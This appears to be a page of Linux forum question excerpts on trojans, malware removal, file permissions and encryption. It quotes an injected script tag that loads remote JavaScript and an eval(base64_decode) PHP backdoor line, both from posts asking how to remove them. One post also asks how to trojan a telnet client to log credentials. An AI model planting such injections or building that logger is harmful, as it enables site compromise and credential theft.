Ubuntu Security :: Using Ubuntu To Remove Trojan From Windows 7

May 31, 2011

I stupidly clicked on a spam link on my roommate's computer (I must have forgotten that I wasn't using Ubuntu and had to be much more careful) and the computer is now infected by a nasty Trojan. (I unfortunately cannot remember the name right now, but it is a Trojan.) Now, her computer will barely start up under the normal Windows 7 without a blue screen of death appearing, with the IRQL_NOT_LESS_OR_EQUAL error message. I stumbled upon this: http://maketecheasier.com/remove-win...ux/2010/02/02/ and I thought I would give it a shot. I don't have a flash drive, and I'm rather tight on cash at the moment, so instead of creating a USB stick with the OS they recommended, I used my live CD of Ubuntu 10.4. I installed Clam, and ran the update as it says, and it seemed to work alright. When I started the scan, however, (excluding .doc files), the first message that came up was that the software was out of date, but the scan proceeded, and so I figured all was alright. The scan took about an hour 45, and when it was done, it reported that 0 files were infected, and that there were 4 errors. I crossed my fingers and hoped that these errors were the problem and Clam fixed it, but alas, this was not the case. The computer is still just as screwed up.

Does anyone have any suggestions? Maybe the updates couldn't be saved because I was using a live CD instead of a USB? Hopefully this isn't the case, because I really don't want to have to go and buy a flash drive, but I will if I must. Can a portion of an external hard drive be used as a boot drive?


Fedora Servers :: Windows PC Antivirus Picked Up A Trojan Horse Called "PHP/Rst.AK Trojan"

Feb 19, 2009

After compressing one of my sites and downloading it to my Windows PC, my antivirus picked up a trojan horse called "PHP/Rst.AK Trojan". I'm still very new to all this and was wondering how I go about removing malware etc. from my Fedora 8 server. Is there a free virus scanning software I should be using?


Ubuntu :: Remove Trojan From A Website?

Jun 28, 2010

One of my friends' website has the following code in almost 1500 files:

Code:
<script type="text/javascript" src="http://kollinsoy.skyefenton.com:8080/Data_Type.js"></script>
<!--db99f6effefc0ff79b57c785dc1a107c-->

How can I remove it? I tried clamscan but it did not find anything. I was thinking if I can use grep/sed to remove the above from the files.


Ubuntu Security :: Trojan Virus Wiped Off Printer Programs?

May 16, 2010

I used my printer without any problems using Ubuntu OS. As the day went on, surfing got slower. I lost the ability to print. Went into Windows OS, which I haven't used for a few days, and scanned with superantispyware. A Trojan virus was found. Went back to Ubuntu OS and found that all printer programs had been removed.


Ubuntu Security :: Trojan Virus Keeps Coming In Share Directory?

Sep 27, 2010

After some time I always see a trojan virus in my Ubuntu machine's shared folder. It is an exe detected by ClamAV as Trojan.Autokit-77. I thought I was getting it from some Windows machine on the network, but that isn't the case. I deleted the virus and removed my computer from the network and still the virus comes back. My computer, however, is still connected to the internet through an independent mobile broadband USB stick.

So where is the virus coming from and why is it going to my shared folder? I thought Ubuntu would not allow the virus to do something like this without me giving it permission. I am running 10.4.


Security :: How To Trojan A Telnet Client

Jun 20, 2010

I want to log the user name and password passed through the default telnet client on Fedora (7 to 11) system. I have thought of something like this: (Download Telnet client src) -> (modify src) -> (compile and install), but I am not sure...


Ubuntu Security :: Run A Program That Is Infected With A Trojan / Virus In Wine Will Effect It

May 2, 2010

If I run a program that is infected with a trojan/virus in Wine, will it affect Ubuntu?


Security :: Transient Rkhunter Warning Of Sebek/adore Trojan On Desktop Debian?

Feb 22, 2011

Like Jackp27, I am reacting to a transient warning from rkhunter, indicating a possible LKM trojan, which may or may not be a false positive. Running chkrootkit and rkhunter repeatedly, including older versions running under live CDs like INSERT, indicated nothing wrong, but two runs of rkhunter running under the possibly compromised system itself did seem to suggest rkhunter thought it might have found elements of trojan code in RAM.

Like Jackp27, I can't give details right now because I do not currently have access to my logs, but I did find one webpage (can't give link because I do not currently have access to my detailed notes) suggesting that rkhunter may have thought it found a signature of the adore trojan in RAM by looking at /proc/kallsymms, which is not a file I ordinarily look at. I did look at it very closely yesterday, repeatedly, and it seems to be mostly empty, but occasionally seems to contain what might be a sequence of calls to various kernel modules--- right now I only recall that some had the form ??_guest_? and that x_tables might be involved.

Can anyone give me a rough indication of what /proc/kallsymms is supposed to do, whether it should normally be empty, and when it is not, what kind of lines are supposed to show up in that "file" when I cat it? I also saw something about ?_logdrop? which may have had something to do with rotating logs (I rebooted several times) rather than a trojan keylogger. But maybe some trojans rotate logs to try to hide their presence?

I know I am not giving enough information--- I hope to come back later with more details after I have managed to access my logs and notes, so feel free to say what kind of details would be most helpful in helping me decide whether or not this was a false positive.


Ubuntu :: View Source Code For Trojan

Jun 3, 2011

I just pulled the MS Removal Tool executable off a Windows 7 machine. Is there a way I can view the code on my Ubuntu machine? I am curious how they block the "real" av software from running. I did get rid of it, pretty simple.


Fedora Security :: Remove Nagging Security Screen?

Oct 10, 2009

If I leave the computer running for a few minutes without doing anything on it, this screen appears demanding that I enter my password, otherwise I can't get back to Fedora. I understand the necessity for this security feature in a work environment, but I'm just a home user and this security screen is just a nagging problem I don't know how to get rid of.


General :: Win Trojan And Worm Removal From Live?

Jun 21, 2011

PartedMagic live Linux can load to memory and run ClamAV on a Windows drive to check for and remove viruses. However, I also need to find and remove trojans and worms on a Windows drive which ClamAV cannot find. Are there any worm and trojan removers for Linux, or do you need to install WINE and run the Windows trojan and worm removers?


Ubuntu Security :: Remove All Privileges From CWD?

Jan 21, 2010

I am on the admin account of my computer and am trying to remove all privileges from CWD. I have tried

chmod go-rwx ~
sudo chmod go-rwx ~

but when I pull up

ls -l ~

It is still showing permission in the g and o column.


Ubuntu Security :: Remove Authentication Completely From My Pc?

Jan 7, 2010

How can I remove authentication completely from my pc?
How can I edit the files present in the patrician filesystem?


Ubuntu Security :: Malware + MBR - How To Discover/remove

Feb 28, 2010

Can a virus survive a reformat, running bootrec /fixmbr (both from the install CD), and then installing Ubuntu? Reformat meaning from the windows disk recovery console, using the format command for all partitions. Likewise, would a virus be capable of surviving just the first two steps alone without installing Ubuntu, just re-installing windows?

If one were to have an MBR virus on Windows or Linux, how abouts would you find or remove it without doing an entire disk wipe? And before someone goes "Linux is immune" take into consideration vulnerabilities on the user end.


Ubuntu Security :: Remove String From All Files?

Oct 12, 2010

How can I remove this string from all files? I am not sure how it got there.

PHP Code:
<?php /**/eval(base64_decode('')); ?>

I tried this, but it did not work:

PHP Code:

find . -iname *.php* -exec sed -i 's/<?php /**/eval(base64_decode('')); ?> //g' {} ;


Ubuntu Security :: Rebooting From Windows - When X Is Starting Up Before The Login Screen Comes Up It Will Flash A Screenshot From Windows

Oct 31, 2010

I have a dual-boot with windows and linux. Sometimes if I reboot from windows into linux, I notice that when X is starting up before the login screen comes up it will flash a screenshot from Windows. Has anyone ever noticed this?


Ubuntu Security :: Remove Delete Permissions On Certain Folders?

Feb 8, 2010

I have an Ubuntu file server with a mix of 30+ users (mix of Windows and Linux). All are members of the same group. All need read, write, and create access. I want to prevent deletion of certain key folders. How can I achieve this? sudo chmod -R nnnn ??


Ubuntu Security :: Found LKL And Can't Remove - Isn't Showing Up In Synaptic

Apr 7, 2010

I found LKL on my computer. I need to remove it. It isn't showing up in Synaptic and I can't figure out how to remove it. sudo apt-get remove lkl tells me this: E: Couldn't find package lkl. I can't find it with the search or with Google.


Ubuntu Security :: Remove Home Folder Encryption?

May 3, 2010

When I installed, I selected the option to encrypt my home folder. I believe this is causing constant crashes now, since error message is user id/password related. Is there a way to remove the encryption?


Ubuntu Security :: Remove The Whole Disk Encryption Without Reinstalling?

Jul 31, 2010

Is there any way to remove the whole disk encryption without reinstalling? I'm running Ubuntu 10.04.


Ubuntu Security :: Remove 'sudo' Via The Software Center?

Jul 10, 2011

I've installed Ubuntu via UNetbootin from USB on my child's computer. It comes by default with the sudo command which I find really annoying to work with. I'd rather have my su command.

Now, while googling for a removal instruction, I've read that the sudo command is tied to system functions on some Ubuntu live systems and can't be removed easily. Does anyone know if this applies to the 10.04 live version used by UNetbootin and how to work around this problem?

If not, is it simply enough to remove 'sudo' via the software center? I find many tutorials on how to switch from su to sudo but not much about the other way around.


Security :: Unable To Use Windows To Change The Security Of The Samba Share?

Mar 19, 2010

I've got a samba share on a linux server, connecting to it with a windows 2k3 server via tools > map network drive. The goal is to be able to use windows to change the security of the samba share. The good news is it works! The bad news is it's not QUITE perfect:

The share is called /company. I started with the following to give everyone access to everything, set the owner of the share to administrator (my domain admin on the Windows domain), and set the group owner to domain users (group that everyone on the domain is part of):

Code:
chmod -R 777 /company
chown -R administrator /company
chgrp -R "domain users" /company

I then mapped the drive as a regular user, and of course, can access/modify/delete/rename/create anything I want. Then I picked a folder to lock down. Let's call it /company/myFolder. I did this on the Windows server by mapping the drive as administrator (the owner), right click > properties > security tab > advanced > highlight "domain users" and "everyone" and click edit > clear all (i.e. remove all access). Go back to Linux and

[Code]..

The only issue that remains is that I am able to rename/delete "myFolder" as a regular user. I thought this was coming from the "acl map full control = true" parameter in smb.conf, but I changed it to false and verified the change and it still happens. If I remove group and world write access to /company, I am no longer allowed to rename/delete myFolder, but then I can't create a new folder. If I add group write access back in I can create files but can also rename/delete folders within /company that have --- specified for group access. Any ideas what I need to tweak to make this right?


Ubuntu Networking :: Remove WPA-PSK Security In The Netgear Router Settings?

Jan 1, 2010

I installed Ubuntu 9.10 Netbook Remix on my Acer Aspire One D250 computer. The Broadcom wireless NIC succeeds in connecting to the network, but only if I remove the WPA-PSK security in the Netgear router settings. What do I need to change in order to be able to secure my network?


Ubuntu Security :: Remove The 6600/tcp Connection Ability From XWindow?

Apr 15, 2011

I've been reading a lot of articles on Xorg XWindow System having the ability to allow 6600/tcp for remote screen connections and I've been trying to find a way to remove the functionality without having to just dump XWindow and settle for CLI on my server. I heard it was disabled by default, but I just want to get rid of that ability completely by cutting it out of its code and yes, I'm feeling very, very paranoid.


Security :: Security Myths Talking To People Using Windows

May 20, 2011

Since the last thread I posted got way off topic due to my bad doing, I will post it again to get the thread back on topic. I will try it one last time; hopefully these myths will be cleared up and this thread will stay on topic and not derail like the last one. The myths going around on the internet:

1. Less than 1% use Linux and 10% use Mac OS X; it is not that they are so much better, but market share. The malware makers are going to Windows, where the market share is.

2. Windows has more security but most people don't use it.

3. Mac OS X security is not that good; Windows is better.

4. Windows has more gradual permission levels than an ON and OFF like Linux or Mac OS X.

5. Malware is growing with Linux and Mac OS X now.


General :: Security Versus Windows Security

Sep 10, 2009

As Linux gains in popularity, (as I believe it will), do you think that Linux will ever become the target of as many virus and worm threats as Windows has faced? If so, do you think that the threats will have much success?


Ubuntu :: Remove It Using Windows XP?

Jan 15, 2010

I have a dual boot system with Win XP and Ubuntu 9.10. My problem is that I am not able to start Ubuntu anymore; it fails to boot.
Actually I don't intend to repair it; instead I would like to remove it and free up the space used by the Ubuntu partition on my hard drive. I want to save some of my files kept in the Linux filesystem, but I can live without them if that is not possible.


Ubuntu :: 11.04 - How To Remove Windows OS

May 16, 2011

I installed Ubuntu 11.04 using Wubi. Now I want to get rid of Windows. How do I do this?


Security :: Remove The Suid Bits From All Programs?

Jan 20, 2010

I've searched the forum, but nothing answers my question. We know the security risk posed by suid, sgid. I'm looking to remove the suid bits from all programs that do not absolutely need it.

This command:
find / -type f \( -perm -04000 -o -perm -02000 \) -exec ls -lg {} \;
gave the list below.

For which of these programs can I safely remove the suid bit? I don't want to break my system by modifying a program that the system needs.

-r-sr-xr-x 1 bin 502172 Jan 10 12:36 /usr/local/bin/dccproc
-r-sr-xr-x 1 bin 186683 Jan 10 12:36 /usr/local/bin/cdcc
-r-s--x--x 1 root 23980 Nov 17 00:27 /usr/lib/virtualbox/VBoxNetDHCP
-r-s--x--x 1 root 9896 Nov 17 00:27 /usr/lib/virtualbox/VBoxNetAdpCtl
-r-s--x--x 1 root 23976 Nov 17 00:27 /usr/lib/virtualbox/VBoxSDL

[Code]...


Security :: Remove Access To MOST Of These SUID Binaries?

Mar 16, 2010

I say to remove access to MOST of these SUID binaries? Do they all need this power? What I want to do is minimize access just in case one of them gets an exploit (as I've already done for Apache suEXEC).

[Code]...







